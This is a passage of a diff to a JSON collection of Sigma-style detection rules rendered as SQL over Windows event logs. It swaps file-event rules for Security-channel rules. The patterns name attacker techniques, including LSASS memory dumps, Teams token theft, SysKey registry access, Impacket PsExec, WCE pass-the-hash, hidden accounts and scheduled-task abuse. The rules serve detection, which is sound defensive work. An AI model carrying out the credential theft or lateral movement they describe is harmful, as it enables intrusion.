"SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" + "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" }, { - "title": "WerFault LSASS Process Memory Dump", - "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", - "status": "experimental", - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "status": "test", + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_werfault_dump.yml" + "filename": "win_security_dcom_iertutil_dll_hijack.yml" }, { - "title": "Windows Webshell Creation", - "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "title": "Password Protected ZIP File Opened (Email Attachment)", + "id": "571498c8-908e-40b4-910b-d2369159a3da", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate used of encrypted ZIP files" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + ], + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + }, + { + "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "status": "test", - "description": "Possible webshell file creation on a static web site", - "author": "Beyu Denis, oscd.community, Tim Shelton", + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (NewProcessName = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" ], - "filename": "file_event_win_webshell_creation_detect.yml" + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" }, { - "title": "Suspicious Outlook Macro Created", - "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "title": "Malicious Service Installations", + "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", "tags": [ "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" ], - "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + "filename": "win_security_mal_service_installs.yml" }, { - "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", - "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "title": "Replay Attack Detected", + "id": "5a44727c-3b85-4713-8c44-4401d5499629", "status": "experimental", - "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml" + "filename": "win_security_replay_attack_detected.yml" }, { - "title": "Suspicious ADSI-Cache Usage By Unknown Tool", - "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "title": "SysKey Registry Keys Access", + "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "status": "test", - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_adsi_cache_usage.yml" + "filename": "win_security_syskey_registry_access.yml" }, { - "title": "Legitimate Application Dropped Script", - "id": "7d604714-e071-49ff-8726-edeb95a70679", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write scripts to disk", - "author": "frack113, Florian Roth", + "title": "Impacket PsExec Execution", + "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "status": "test", + "description": "Detects execution of Impacket's psexec.py.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" ], - "filename": "file_event_win_legitimate_app_dropping_script.yml" + "filename": "win_security_impacket_psexec.yml" }, { - "title": "Suspicious File Event With Teams Objects", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "status": "test", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas Patzke", "tags": [ "attack.credential_access", - "attack.t1528" + "attack.t1003", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" ], - "filename": "file_event_win_access_susp_teams.yml" + "filename": "win_security_mal_wceaux_dll.yml" }, { - "title": "Office Macro File Creation From Suspicious Process", - "id": "b1c50487-1967-4315-a026-6491686d860e", - "status": "experimental", - "description": "Detects the creation of a office macro file from a a suspicious process", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Hidden Local User Creation", + "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "status": "test", + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" ], - "filename": "file_event_win_office_macro_files_from_susp_process.yml" + "filename": "win_security_hidden_user_creation.yml" }, { - "title": "Suspicious Get-Variable.exe Creation", - "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "title": "Suspicious Scheduled Task Creation", + "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "status": "experimental", - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", - "author": "frack113", + "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_get_variable.yml" + "filename": "win_security_susp_scheduled_task_creation.yml" }, { - "title": "Files With System Process Name In Unsuspected Locations", - "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "title": "Operation Wocao Activity - Security", + "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", "status": "test", - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "System processes copied outside their default folders for testing purposes", - "Third party software naming their software with the same names as the processes mentioned here" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" ], - "filename": "file_event_win_creation_system_file.yml" + "filename": "win_security_apt_wocao.yml" }, { - "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", - "id": "07a99744-56ac-40d2-97b7-2095967b0e03", - "status": "experimental", - "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation" - ], + "title": "Suspicious Computer Account Name Change CVE-2021-42287", + "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "status": "test", + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' 